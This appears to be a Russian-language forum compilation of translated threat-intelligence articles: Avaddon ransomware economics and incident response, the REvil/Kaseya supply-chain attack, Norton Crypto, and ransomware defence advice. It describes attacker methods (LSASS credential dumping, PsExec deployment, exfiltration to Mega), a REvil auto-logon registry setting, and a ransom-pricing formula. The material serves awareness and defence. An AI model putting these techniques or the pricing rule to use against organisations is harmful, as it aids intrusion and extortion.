Традиционно при профилировании виктимологии группы компании полагаются на общедоступные данные, то есть на веб-сайты с программами-вымогателями. И действительно, даже глядя на эти частичные данные, которые включают только компании, информация о которых была сброшена в блоги, мы можем увидеть, что Avaddon сыграл важную роль в ландшафте угроз.

[IMG WIDTH=740 HEIGHT=349]https://static.wixstatic.com/media/9d5cee_daa9d710b45f43e88be3a6d0e3447127~mv2.png/v1/fill/w_740,h_349,al_c,q_90/9d5cee_daa9d710b45f43e88be3a6d0e3447127~mv2.webp[/IMG]

Однако жертвы, имена которых были опубликованы в блоге позора, - это только верхушка айсберга. Расширенный набор данных AdvIntel, охватывающий всех жертв Avaddon, обеспечивает дополнительную прозрачность операций.

Для этого статистического исследования компания AdvIntel выбрала специальный набор данных для ценных целей. Во-первых, мы определили отрасли, которые были основными целями группы - производство, розничная торговля, технологии и машиностроение, которые, скорее всего, являются наиболее предпочтительными секторами, потому что для компаний в этих секторах даже кратковременный перерыв в работе может повлечь за собой фатальные последствия.

На следующем этапе мы провели исследование рынка доходов жертв, чтобы определить потенциальную схему атак Avaddon.

Общий доход всех жертв составил около 35 миллиардов долларов. Это число, по сути, сегмент рынка, которому так или иначе угрожают вредоносные операции Avaddon.

Жертв Аваддона можно разделить на три категории: маленькие, средние и большие.

Средний доход жертвы составил:

13 миллионов долларов США для малого бизнеса
287 миллионов долларов для жертв среднего размера
3,7 миллиарда долларов США для крупного бизнеса

Ransonomics: прибыль от программ-вымогателей Avaddon

Наша следующая цель исследования состояла в том, чтобы подсчитать, сколько денег может заработать группа Avaddon до своего быстрого выхода на пенсию. Мы использовали наши предыдущие знания, полученные в результате взаимодействия с злоумышленниками, для разработки реалистичных формул расчета требований выкупа, подкрепленных реальными делами Avaddon.

После определения дохода они исследуют сектор, в котором работает жертва. Наиболее распространенным расчетом, который, согласно нашим конфиденциальным и достоверным источникам информации, используемым Avaddon, был так называемое правило «5x5», когда 5% годового дохода используется для начала переговоров, а годовой доход оценивается в одну пятую от общий доход. Другими словами, для жертвы, чей общий доход составляет 7 миллионов долларов США, начальная цена выкупа будет составлять 70 000 долларов США. Как правило, Avaddon снижал цену во время торга, и конечный выкуп составлял около 50 000 долларов США за успешную операцию.

Однако не все компании из двухтысячного списка жертв были вынуждены заплатить такой выкуп. Во многих случаях переговоры заканчивались неудачей или выкуп был минимальным - несколько тысяч долларов (особенно в самом начале). В то же время более крупные платежи требовали от более крупных организаций. Однако здесь формула «5x5» была заменена более адекватной шкалой для более крупного выкупа, включающей 0,01% годовой прибыли вместо 5% и т. Д. Для многомиллиардной компании спрос ограничивался несколько миллионов долларов.

После завершения всех расчетов с индивидуальным изучением каждой жертвы из набора ценных данных, AdvIntel установил, что основная часть выкупа поступила от более чем тысячи небольших компаний, которые требовали от 30 000 до 70 000 долларов США и составила 55 миллионов долларов, выплаченных компании Avaddon. Более 500 крупных предприятий в списке потерпевших составили еще 30 миллионов долларов, а остальная часть была поделена между более мелкими выплатами. Таким образом, наша общая оценка дохода Avaddon составляет приблизительно 87 миллионов долларов США.

Наша команда также попыталась рассчитать доход основного члена команды Avaddon на основе этих чисел. В рамках Avaddon RaaS более 70% дохода шло филиалам, поэтому основная команда, и особенно лидер Avaddon, получила около 26 миллионов долларов США. Это число, вероятно, было разделено по крайней мере между четырьмя людьми, которые получили приблизительный годовой доход (Avaddon существовал в течение года) 7 000 000 долларов США. Для сравнения - средний годовой доход в России оценивается в 7000 долларов.

[QUOTE] Другими словами, за год разработки программ-вымогателей член Avaddon заработал столько же денег, сколько средний россиянин за тысячелетие[/QUOTE]

Крушение Аваддона - Черная метка киберпиратов

Если Avaddon был таким успешным, что могло побудить их бросить курить? Вероятный ответ - страх. Правоохранительные органы США и администрация Байдена были очень откровенны в отношении будущих ответных мер против программ-вымогателей и новой точки зрения, в которой вымогатели рассматриваются как, по сути, террористический акт. Этот новый подход к цифровому вымогательству со стороны ведущей мировой сверхдержавы вызвал прямой отклик в подпольном сообществе - вышеупомянутая вымогательство - тщательно и скрупулезно выстроенная сеть альянсов и цепочек поставок - начала быстро терпеть неудачу.

Программные брокеры отказались продавать вредоносное ПО группам вымогателей, форумы запретили партнерство RaaS, а филиалы остались без средств и услуг для распространения полезной нагрузки. Мир киберпреступности всегда был похож на пиратство, и у него есть собственная «черная метка» - смертельный знак стигмы - после Colonial Pipeline программы-вымогатели получили этот знак на себе. Avaddon, находившийся в центре динамичной и бурной экосистемы программ-вымогателей, быстро осознал риски, с которыми они могут столкнуться.

Когда политика встречает киберпреступность

Это осознание, вероятно, было вызвано недавним вмешательством политики в сферу киберпреступности. В целом внутренняя логика российского ландшафта безопасности предполагает, что успешная кибер-группа в какой-то момент станет достаточно заметной, чтобы привлечь внимание государства. Обычно правоохранительные органы закрывают глаза на кибероперации, если только эти операции не нацелены на российских граждан или бизнес. Однако в мае 2021 года этот статус-кво изменился.

   [QUOTE]После того, как администратор крупнейшего форума XSS призвал к запрету программ-вымогателей, оправдывая это политическими причинами, сообщество цифровых вымогателей в России, как было замечено, прошло стадии паранойи. Это было подтверждено только многочисленными заявлениями, сделанными за последние три месяца правительством России, Министерством иностранных дел России и лично президентом Путиным о создании международной российско-американской инициативы по созданию совместного ландшафта кибербезопасности. Российские официальные лица, вероятно, видят в этом инструмент деэскалации американо-российских отношений, особенно в свете предстоящего саммита Байдена и Путина, намеченного на 16 июня 2021 года.
[/QUOTE]

Также примечательно, что некоторые из юрисдикций, на которые нацелен Аваддон, - Иран, Китай и Турция, имеют прочные геополитические связи с Россией и действуют как российские союзники или важные экономические партнеры. Однако неясно, могло ли это привести к обострению отношений между Аваддоном и российским государством.

Какими бы ни были истинные доводы российских политиков, призывающих к международному сотрудничеству в области кибербезопасности, эти недавние заявления явно оказали влияние на подпольное сообщество киберпреступников. AdvIntel отслеживает многочисленные обсуждения между высокопоставленными участниками, работающими с Avaddon, которые упомянули, что одно из аффилированных лиц группы было задержано российскими правоохранительными органами накануне американо-российского саммита и что могут последовать дальнейшие аресты лидеров программ-вымогателей с целью обезопасить политический ландшафт.

Avaddon Decryption Tool
https://www.emsisoft.com/ransomware-decryption-tools/avaddon

https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire

Массовая атака REvil затрагивает нескольких поставщиков управляемых услуг и их клиентов через атаку цепочки поставок Kaseya, о которой сообщается.

Начиная с полудня июля, REvil, также известная как Sodinokibi, нацелена на MSP с тысячами клиентов с помощью атаки на цепочку поставок Kaseya VSA.

В настоящее время существует восемь известных крупных поставщиков услуг мобильной связи, которые пострадали в результате этой атаки на цепочку поставок.

Kaseya VSA - это облачная платформа MSP, которая позволяет поставщикам выполнять управление исправлениями и мониторинг клиентов для своих клиентов.

Атака REvil распространяется через автообновление

Как сообщили BleepingComputer атаки на MSP, по всей видимости, являются атакой на цепочку поставок через Kaseya VSA.

В результате обновления, Kaseya VSA поместит файл agent.crt в папку c: \ kworking, которая распространяется как обновление под названием «Kaseya VSA Agent Hot-fix».

Затем запускается команда PowerShell для декодирования файла agent.crt с помощью допустимой команды Windows certutil.exe и извлечения файла agent.exe в ту же папку.

[IMG WIDTH=1236 HEIGHT=233]https://www.bleepstatic.com/images/news/ransomware/attacks/k/kaseya/powershell-command.png[/IMG]

Agent.exe подписан с использованием сертификата от «PB03 TRANSPORT LTD» и включает встроенные файлы «MsMpEng.exe» и «mpsvc.dll», при этом DLL является шифровальщиком REvil.

MsMPEng.exe - это более старая версия законного исполняемого файла Microsoft Defender, используемого в качестве LOLBin для запуска DLL и шифрования устройства с помощью доверенного исполняемого файла.

Некоторые образцы добавляют ключи реестра Windows и изменения конфигурации зараженных компьютеров.

Например, образец [VirusTotal], установленный BleepingComputer, добавляет ключ HKLM \ SOFTWARE \ Wow6432Node \ BlackLivesMatter для хранения информации о конфигурации атаки.

Специалист Intel Виталий Кремез сообщил BleepingComputer, что другой образец настраивает устройство для запуска REvil Safe Mode с паролем по умолчанию «DTrump4ever».

   [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
   "AutoAdminLogon"="1"
   "DefaultUserName"="[account_name]"
   "DefaultPassword"="DTrump4ever"

Fabian Wosar выпустил расшифрованную копию конфигурации шифратора REvil / Sodin. Этот файл содержит подробную информацию о полезной нагрузке программы-вымогателя, включая списки уничтоженных процессов, компоненты из белого списка и используемые домены управления и контроля.

IOC (SHA256):

agent.exe d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e­9f1e

mpsvc.dll (загруженная DLL) e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a546­6ea2

mpsvc.dll (загруженная DLL) 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae7­59dd

MSP - важная цель для кибергрупп, поскольку они предлагают простой канал для заражения многих компаний посредством единственного взлома, однако атаки требуют глубоких знаний о MSP и используемом ими программном обеспечении.

REvil имеет аффилированное лицо, хорошо разбирающееся в технологиях, используемых MSP, поскольку у них есть долгая история нацеливания на эти компании и программное обеспечение, обычно используемое ими.

В июне 2019 года филиал REvil нацелился на MSP через удаленный рабочий стол, а затем использовал их программное обеспечение для управления, чтобы отправить установщиков программ-вымогателей на все конечные точки, которыми они управляют.

https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-200-companies-in-msp-supply-chain-attack/
https://app.any.run/tasks/d02a2a64-750a-47fb-a310-178d1f7276a1#
https://www.bleepingcomputer.com/news/security/kaseya-was-fixing-zero-day-just-as-revil-ransomware-sprung-their-attack/
https://www.bleepingcomputer.com/news/security/revil-ransomware-asks-70-million-to-decrypt-all-kaseya-attack-victims/
https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/

Программа-вымогатель Avaddon - это программа-вымогатель как услуга (RaaS), сочетающая шифрование с кражей данных и вымогательством. Avaddon существует с 2019 года, но с июня 2020 года он стал более заметным и агрессивным. «Аффилированные лица» или клиенты службы наблюдали развертывание Avaddon для широкого круга целей во многих странах, часто посредством злонамеренного спама и фишинговых кампаний с импользованием JavaScript.

Организации, пораженные программой-вымогателем Avaddon, сталкиваются не только с шифрованием данных - существует также угроза раскрытия общедоступных данных на сайте утечки Avaddon и, в последнее время, риск распределенных атак типа «отказ в обслуживании» (DDoS), нарушающих работу. Эта тактика призвана усилить давление на жертв с требованием выкупа.

[B]Что делать немедленно: сдержать и обезвредить[/B]

Первое, что вам нужно сделать, это определить, продолжается ли атака. Если вы подозреваете, что это так, и у вас нет инструментов, чтобы остановить это, определите, какие устройства были затронуты, и немедленно изолируйте их. [B]Самый простой вариант - просто отсоединить сетевой кабель или выключить адаптер Wi-Fi. Если повреждение более масштабное, чем повреждение нескольких устройств, подумайте о том, чтобы сделать это на уровне коммутатора и отключить в автономном режиме целые сегменты сети, а не отдельные устройства. Выключайте устройства только в том случае, если не можете отключить сеть.[/B]

Во-вторых, нужно оценить ущерб. Какие конечные точки, серверы и операционные системы были затронуты, что было потеряно? Ваши резервные копии остались нетронутыми или злоумышленник удалил их? Если они целы, немедленно сделайте автономную копию. Кроме того, какие машины были защищены?

В-третьих, есть ли у вас комплексный план реагирования на инциденты? Если нет, вам необходимо определить, кто должен быть вовлечен в работу с этим инцидентом. Потребуются ИТ-администраторы и высшее руководство, но вам также может потребоваться привлечь внешних экспертов по безопасности, проконсультироваться с киберстраховщиком и юрисконсультом. Следует ли вам сообщать об инциденте в правоохранительные органы и / или информировать органы по защите данных? Также возникает вопрос о том, какую информацию следует предоставлять пользователям и клиентам, многие из которых, вероятно, придут на работу и столкнутся с аналогичной запиской о выкупе на своем рабочем столе.

И последнее, но не менее важное: вы хотите поговорить с людьми о том, что происходит, но злоумышленники могут подслушивать, поэтому не используйте обычные каналы связи. Например, если злоумышленники находятся в вашей сети какое-то время, у них, вероятно, будет доступ к электронной почте.

[B]Что делать дальше: исследовать[/B]

После того, как вам удалось сдержать и нейтрализовать атаку, найдите время, чтобы исследовать, что произошло, чтобы снизить вероятность ее повторения. Если вы не уверены в том, что делаете это самостоятельно, поставщики средств безопасности, в том числе Sophos, круглосуточно предлагают помощь специалистов по реагированию на инциденты и поиску угроз.

По словам команды Sophos Rapid Response, это то, чего вам следует ожидать от активности вымогателя Avaddon в вашей сети:

1. Скорее всего, злоумышленники были в вашей сети несколько дней или даже недель. Avaddon - это программа-вымогатель как услуга, включающая кражу данных. Он управляется человеческими аффилированными лицами, которые получают долю от выкупа. Партнерам нужно время, чтобы изучить сеть цели, чтобы найти и украсть ценные данные и обеспечить максимальное нарушение работы, поскольку это позволяет им взимать более высокие выкуп.

Лица, отвечающие за реагирование на инциденты Sophos, наблюдали время ожидания злоумышленников от 10 до 28 дней в атаках, связанных с выпуском программы-вымогателя Avaddon.

2. Злоумышленники могут использовать множество различных методов для взлома вашей сети. Известные методы начального доступа для программ-вымогателей Avaddon включают, помимо прочего, спам-кампании, доставляющие вредоносные файлы JavaScript, открытые службы RDP (протокол удаленного рабочего стола) и уязвимые виртуальные частные сети (VPN). Такие сайты, как Shodan.io, дают представление о том, что может сделать злоумышленник. узнать о своей сети; попробуйте использовать его для поиска ваших внешних IP-адресов.

Злоумышленники Avaddon нацелены на системы как Windows, так и Linux.

3. У них будет защищенный доступ к учетным записям администраторов домена, а также к другим учетным записям пользователей. Злоумышленники обычно взламывают несколько учетных записей во время атаки. Их основная цель - получить доступ к учетным записям администраторов домена, которые они могут использовать для запуска вымогателей. Однако они также нацелены на определенные учетные записи администраторов, которые имеют доступ к конфиденциальным данным, системам резервного копирования и консолям управления безопасностью.

Злоумышленники Avaddon используют такие инструменты, как Mimikatz, для кражи учетных данных для доступа к учетной записи и для повышения привилегий после того, как они окажутся внутри сети. Mimikatz может собирать информацию из запущенного процесса Microsoft LSASS.exe, который содержит хэши имен и паролей пользователей, вошедших в систему в данный момент. Иногда злоумышленники оставляют эту функцию включенной, а затем намеренно ломают что-то на компьютере, на которое они нацелены, спровоцировав администратора войти в систему, чтобы исправить это. Затем злоумышленники могут захватить учетные данные этого администратора.

Если Mimikatz заблокирован программным обеспечением безопасности, злоумышленники могут вместо этого использовать что-то вроде Microsoft Process Monitor для создания дампа памяти LSASS.exe и переноса этого файла дампа обратно на свою машину для извлечения информации с помощью Mimikatz. С Mimikatz не имеет значения, насколько длинные или сложные пароли, потому что они забирают их прямо из памяти.

4. Они просканируют вашу сеть. Они знают, сколько у вас серверов и конечных точек и где вы храните свои резервные копии, критически важные для бизнеса данные и приложения. Одна из первых вещей, которую делают злоумышленники, когда они попадают в сеть, - это определить, какой доступ у них есть на локальной машине. Следующий шаг - выяснить, какие существуют удаленные машины и могут ли они получить к ним доступ.

Операторы программ-вымогателей Avaddon, как и многие другие злоумышленники, использующие ручную клавиатуру, используют RDP для внутреннего бокового перемещения внутри сети, используя его для проникновения на серверы и компьютеры, которые несут ценные активы.

5. Злоумышленники, скорее всего, загрузили и установили бэкдоры, которые позволяют им заходить и выходить в вашу сеть и устанавливать дополнительные инструменты. Они настроят папки и каталоги для сбора и хранения украденной информации и каналов для связи с злоумышленниками и для передачи информации из вашей сети.

Бэкдоры бывают разных форм. Некоторые просто связываются с IP-адресом злоумышленников, позволяя им отправлять и получать команды на машину.

Многие бэкдоры классифицируются как легальные приложения. Например, злоумышленники могут использовать инструменты удаленного администрирования, такие как RDP, для поддержания доступа. Даже если RDP отключен по умолчанию, злоумышленнику с правами администратора очень легко его снова включить. Еще один распространенный законный инструмент - AnyDesk. Это предлагает злоумышленникам прямой контроль над машиной, включая управление мышью / клавиатурой и возможность видеть экран.

Известно, что операторы Avaddon используют Cobalt Strike, усовершенствованный инструмент для постэксплуатационного тестирования на проникновение. Злоумышленники часто пытаются установить маяк Cobalt Strike. Это обеспечивает регулярную обратную связь с сервером Cobalt Strike («командование и управление» для атаки Avaddon) и дает злоумышленникам полный контроль над машиной. Его также можно использовать для простого развертывания дополнительных маяков на других машинах в сети.

6. В дополнение к шифрованию данных и нарушению работы программного обеспечения и операций операторы Avaddon будут пытаться эксфильтровать корпоративные данные до основного события, связанного с вымогательством. Специалисты по реагированию на инциденты, которые расследовали атаки с участием Avaddon, обнаружили, что операторы использовали инструмент архивирования WinRar для сбора данных для эксфильтрации, а затем переправили данные поставщику облачного хранилища www.Mega.nz, используя свое приложение MegaSync. Mega пользуется популярностью у злоумышленников, поскольку предлагает им определенный уровень анонимности.

7. Они попытаются зашифровать, удалить, сбросить или удалить ваши резервные копии. Если ваши резервные копии не хранятся в автономном режиме, они находятся в пределах досягаемости злоумышленников. «Резервная копия», которая постоянно находится в сети и доступна, - это всего лишь вторая копия файлов, ожидающих шифрования.

8. Злоумышленники попытаются определить, какое решение безопасности используется в сети и могут ли они его отключить. Неважно, насколько хороша ваша защита, если злоумышленник может ее отключить.

Бесплатные инструменты по умолчанию, такие как Защитник Windows, могут быть немедленно отключены любым, у кого есть достаточные права администратора. Большинство современных программ-вымогателей пытаются сделать это по умолчанию. Злоумышленники также пытаются найти и получить доступ к консолям управления более продвинутых решений безопасности, чтобы отключить всю защиту непосредственно перед запуском программы-вымогателя.

Консоли управления безопасностью, размещенные локально, особенно подвержены риску, поскольку злоумышленники могут получить к ним доступ с учетными записями, которые они уже взломали.

9. Наиболее заметная часть атаки - выпуск программы-вымогателя - вероятно, произошла, когда ИТ-администраторы или специалисты по безопасности не были в сети, чтобы заметить и предотвратить длительный процесс шифрования файлов, возможно, посреди ночи или в выходные дни.

Примечание. Процесс шифрования занимает несколько часов. К моменту завершения работы программы-вымогателя на зашифрованной конечной точке Windows будут находиться десятки или сотни тысяч зашифрованных файлов. Для больших файловых серверов это может исчисляться миллионами. Вот почему большинство целевых атак программ-вымогателей запускаются посреди ночи, в выходные или праздничные дни, когда их наблюдает меньше людей.

10. Программа-вымогатель будет развернута на всех ваших конечных точках и любых серверах, которые были подключены к сети во время атаки - при условии, что это то, чего хотел злоумышленник. Программа-вымогатель «развертывается» как обычное приложение; в большинстве атак он не распространяется случайным образом во всех направлениях. Если ваши серверы были зашифрованы, но не ваши конечные точки, это потому, что злоумышленник решил нацеливаться только на ваши серверы.

Программа-вымогатель может быть развернута разными способами. В случае Avaddon злоумышленники, скорее всего, создали запланированные задачи на конечных точках и серверах в сети, которые развернули программу-вымогатель в заранее определенное время.

Другой метод, обычно используемый многими различными семействами программ-вымогателей, - это комбинация пакетных сценариев и инструмента Microsoft PsExec, который является отличным инструментом для выполнения команд на удаленных машинах. Злоумышленник может создать пакетный сценарий, который просматривает список ваших IP-адресов, используя PsExec для копирования программы-вымогателя на каждую машину, а затем выполняет ее.

Хотя большинство решений безопасности (включая Sophos) по умолчанию блокируют PsExec, администраторы часто разрешают его использование в своей сети, потому что они тоже считают его полезным - и, к сожалению, злоумышленники это знают.

Злоумышленники также могут создать или изменить существующий сценарий входа в систему объекта групповой политики (GPO). Если вы не заметите этого, атака может возобновляться каждый раз, когда машина загружается и подключается к домену. Создается впечатление, что программа-вымогатель «распространяется», когда она вызвана только объектом групповой политики.

11. Запуск программы-вымогателя - это еще не конец. Злоумышленники могут использовать установленные ими ранее инструменты, чтобы оставаться в сети для отслеживания ситуации и даже для вашей электронной почты, чтобы увидеть, как вы реагируете на выпуск программы-вымогателя. Электронное письмо генеральному директору, в котором говорится, что с вами все будет в порядке, потому что они не зашифровали резервные копии на Сервере X, может привести к катастрофе, если злоумышленник прочитает его и все еще имеет доступ к этому серверу.

Злоумышленник также может дождаться вашего восстановления, чтобы затем запустить вторую атаку, чтобы действительно подчеркнуть, что он может продолжать делать это, пока вы не заплатите.

У злоумышленников Avaddon есть еще одна тактика, направленная на то, чтобы заставить цели заплатить: они запускают DDoS-атаку в попытке нарушить работу и связь.

12. Время, проведенное в вашей сети, вероятно, позволило злоумышленникам украсть критически важную, конфиденциальную и конфиденциальную информацию, которую они теперь угрожают публично раскрыть. Контроллеры Avaddon RaaS используют общедоступный «сайт утечки»: avaddongun7rngel [.] Onion. Цели, пораженные филиалами Avaddon, подвергаются риску публикации их данных на сайте для всеобщего обозрения, если они не заплатят выкуп. Некоторые из наиболее ценных данных могут быть проданы другим злоумышленникам для использования в дальнейших атаках.

Злоумышленники Avaddon утверждают, что они начнут публиковать украденные данные где-нибудь через несколько дней или неделю после основной атаки, если не будет получен контакт с целью или переговоры прервутся. Обычно они начинают с публикации около 5% данных, которые, по их утверждениям, хранятся. Однако может пройти несколько недель или даже больше, прежде чем что-либо будет опубликовано.

Кроме того, хотя злоумышленники могут пообещать удалить вашу информацию, если вы заплатите, у вас нет никаких гарантий, что они это сделают.
Что могут сделать защитники

Вы можете предпринять ряд упреждающих шагов для повышения своей ИТ-безопасности в будущем, в том числе:

[QUOTE] Контролируйте свою сетевую безопасность 24/7 и помните [URL=https://news.sophos.com/en-us/2020/08/04/the-realities-of-ransomware-five-signs-youre-about-to-be-attacked/]о пяти ранних индикаторах присутствия злоумышленника[/URL], чтобы остановить атаки программ-вымогателей, прежде чем они начнутся.

 Отключите протокол удаленного рабочего стола (RDP) с выходом в Интернет, чтобы запретить киберпреступникам доступ к сетям. Если вам нужен доступ к RDP, поместите его за VPN-соединение и принудительно используйте многофакторную аутентификацию (MFA).

   Обучите сотрудников тому, на что следует обращать внимание в отношении фишинга и вредоносного спама, и внедрите надежные политики безопасности.

   Регулярно создавайте резервные копии самых важных и актуальных данных на автономном устройстве хранения. Стандартная рекомендация для резервного копирования - следовать методу 3-2-1: 3 копии данных с использованием 2 разных систем, 1 из которых находится в автономном режиме.

   Предотвратите доступ злоумышленников к вашей безопасности и отключите ее: выберите расширенное решение с облачной консолью управления с включенной многофакторной аутентификацией и ролевым администрированием для ограничения прав доступа

   Помните, что не существует единой серебряной пули для защиты, и важна многоуровневая, многоуровневая модель безопасности - распространите ее на все конечные точки и серверы и убедитесь, что они могут обмениваться данными, связанными с безопасностью

   Разработайте эффективный план реагирования на инциденты и обновляйте его по мере необходимости. Если вы не уверены, что обладаете навыками или ресурсами, чтобы делать это, отслеживать угрозы или реагировать на чрезвычайные ситуации, подумайте об обращении за помощью к внешним экспертам.
[/QUOTE]

Заключение

[SIZE=14pt]Работа с кибератакой - это стрессовый опыт. Может возникнуть соблазн устранить непосредственную угрозу и закрыть книгу об инциденте, но правда в том, что таким образом вы вряд ли устранили все следы атаки. [B]Важно, чтобы вы нашли время, чтобы определить, как злоумышленники проникли, извлечь уроки из любых ошибок и улучшить свою безопасность.[/B] Если вы этого не сделаете, вы рискуете, что тот же злоумышленник или другой может прийти и сделать то же самое на следующей неделе.[/SIZE]

https://news.sophos.com/en-us/2021/05/24/what-to-expect-when-youve-been-hit-with-avaddon-ransomware/

[B]NortonLifelock добавил возможность майнить криптовалюту Ethereum непосредственно в своей антивирусной программе Norton 360 в качестве способа «защиты» пользователей от вредоносного программного обеспечения для майнинга.[/B]

Эта новая функция майнинга называется «Norton Crypto» и будет внедрена завтра для пользователей Norton 360, участвующих в программе раннего внедрения Norton.

Когда Norton Crypto включен, программное обеспечение будет использовать графическую карту (GPU) устройства для майнинга Ethereum, который затем будет перенесен в кошелек Norton, размещенный в облаке.

Неясно, каждое ли устройство, на котором работает Norton Crypto, занимается майнингом независимо или в составе группы пользователей, чтобы повысить шансы на получение вознаграждения в виде Ethereum.

Поскольку сложность майнинга Ethereum самостоятельно очень высока, пользователи Norton, вероятно, будут объединены вместе, чтобы повысить шансы на добычу блока. Если Norton управляет пулом для этой новой функции, они могут взимать небольшую плату за весь добытый Ethereum, как это принято у операторов пулов, что делает эту новую функцию источником дохода для компании.

Поскольку майнеры криптовалюты и соответствующее программное обеспечение обычно помечаются антивирусными программами, Norton заявляет, что эта функция позволяет пользователям майнить Ethereum, не жертвуя своей безопасностью.

«Поскольку криптоэкономика продолжает становиться все более важной частью жизни наших клиентов, мы хотим дать им возможность майнить криптовалюту с помощью Norton, бренда, которому они доверяют», - сказал Винсент Пилетт, генеральный директор NortonLifeLock. «Norton Crypto - еще один инновационный пример того, как мы расширяем нашу платформу кибербезопасности для защиты постоянно меняющейся цифровой жизни наших клиентов».

https://www.bleepingcomputer.com/news/cryptocurrency/norton-360-antivirus-now-lets-you-mine-ethereum-cryptocurrency/

[B] Как защитить сеть от DarkSide и других программ-вымогателей
[/B]
Следующие ниже методы могут помочь организациям снизить риск инцидента с шифраторами.

[B]Тренинг по повышению осведомленности о кибербезопасности[/B]: поскольку большая часть программ-вымогателей распространяется посредством действий, инициированных пользователями, организациям следует внедрять обучающие программы, направленные на обучение конечных пользователей основам кибербезопасности. Программы-вымогатели и методы их распространения постоянно развиваются, поэтому обучение должно происходить постоянно, чтобы конечные пользователи могли столкнуться с текущими угрозами.
[B]Гигиена учетных данных[/B]: соблюдение надлежащей гигиены учетных данных может помочь предотвратить атаки методом перебора, смягчить последствия кражи учетных данных и снизить риск несанкционированного доступа к сети.
[B]Многофакторная аутентификация[/B]: MFA обеспечивает дополнительный уровень безопасности, который может помочь предотвратить несанкционированный доступ к учетным записям, инструментам, системам и хранилищам данных. Организации должны рассмотреть возможность включения MFA везде, где это возможно.
[B]Исправления безопасности:[/B] организации любого размера должны иметь надежную стратегию управления исправлениями, которая гарантирует, что обновления безопасности на всех конечных точках, серверах и устройствах применяются как можно скорее, чтобы минимизировать окно возможностей для атаки.
[B]Резервное копирование[/B]: резервное копирование - один из наиболее эффективных способов смягчения последствий инцидента с программным вымогателем. Многие виды программ-вымогателей могут распространяться по сети и шифровать локально хранимые резервные копии, поэтому организациям следует использовать различные хранилища мультимедиа и хранить резервные копии как на месте, так и за его пределами. См. Это руководство для получения дополнительной информации о создании резервных копий, защищенных от программ-вымогателей.
[B]Повышение безопасности системы:[/B] усиление защиты сетей, серверов, операционных систем и приложений имеет решающее значение для уменьшения поверхности атаки и управления потенциальными уязвимостями безопасности. Отключение ненужных и потенциально используемых служб, таких как PowerShell, RDP, Windows Script Host, макросы Microsoft Office и т. Д., Снижает риск первоначального заражения, а реализация принципа наименьших привилегий может помочь предотвратить боковое перемещение.
[B]Блокировать макросы[/B]: многие семейства программ-вымогателей поставляются через встроенные макросы Microsoft Office или PDF-документы. Организации должны пересмотреть использование макросов, рассмотреть возможность блокировки всех макросов из Интернета и разрешить выполнение только проверенных и утвержденных макросов из надежных мест.
[B]Аутентификация электронной почты[/B]: организации могут использовать различные методы проверки подлинности электронной почты, такие как структура политики отправителя, почта с идентификацией DomainKeys и проверка подлинности сообщений на основе домена, отчетность и соответствие, для обнаружения подделки электронной почты и выявления подозрительных сообщений.
[B]Сегрегация сети:[/B] эффективное разделение сети помогает сдерживать инциденты, предотвращает распространение вредоносных программ и сокращает нарушение целостности бизнеса.
[B]Мониторинг сети:[/B] организации любого размера должны иметь системы для отслеживания возможных каналов утечки данных и немедленного реагирования на подозрительную активность.
[B]Тестирование на проникновение[/B]: тестирование на проникновение может быть полезно для выявления уязвимостей в ИТ-инфраструктуре и уязвимости сотрудников к программам-вымогателям. Результаты теста можно использовать для распределения ИТ-ресурсов и информирования о будущих решениях по кибербезопасности.
[B]План реагирования на инциденты[/B]: организации должны иметь комплексный план реагирования на инциденты, в котором точно указывается, что делать в случае заражения. Быстрое реагирование может помочь предотвратить распространение вредоносного ПО, свести к минимуму сбои и обеспечить максимально эффективное устранение инцидента.

https://blog.emsisoft.com/en/38577/ransomware-profile-darkside/